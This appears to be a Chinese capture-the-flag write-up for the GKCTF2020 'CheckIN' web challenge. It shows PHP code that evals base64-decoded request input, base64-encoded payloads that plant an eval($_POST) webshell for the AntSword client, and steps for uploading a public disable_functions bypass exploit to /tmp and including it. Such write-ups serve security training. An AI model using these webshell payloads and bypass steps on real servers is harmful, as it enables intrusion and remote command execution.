[GKCTF2020]CheckIN

题目复现地址

<title>Check_In</title>
 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

给了一个命令执行点,把命令base64编码一下即可执行,先构造一个phpinfo();

PS C:\Users\Administrator> php -r "echo base64_encode('phpinfo();');"
cGhwaW5mbygpOw==

查看phpinfo()发现过滤了很多函数,猜测这题又是disable_functions bypass
[GKCTF2020]CheckIN_第1张图片
先构造个shell,蚁剑连上去,?Ginkgo=eval($_POST['m0c1nu7']);,base64编码一下

?Ginkgo=ZXZhbCgkX1BPU1RbJ20wYzFudTcnXSk7

蚁剑shell设置里面Encoder选择base64
[GKCTF2020]CheckIN_第2张图片
[GKCTF2020]CheckIN_第3张图片

猜测需要执行/readflag文件才能得到flag,接下来上传disable functions bypass脚本突破执行命令即可,bypass脚本github有很多,自己找一下即可

这里贴一个bypass脚本地址:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

改一下执行命令即可
[GKCTF2020]CheckIN_第4张图片
随便找一个能上传的路径,这里就在/tmp/路径下上传bypass脚本shell.php

[GKCTF2020]CheckIN_第5张图片
然后在命令执行点包含shell.php即可获得flag

include('/tmp/shell.php');base64编码之后得到:aW5jbHVkZSgnL3RtcC9zaGVsbC5waHAnKTs=

[GKCTF2020]CheckIN_第6张图片

你可能感兴趣的:(CTF_WEB_Writeup,GKCTF2020,CheckIN,WP)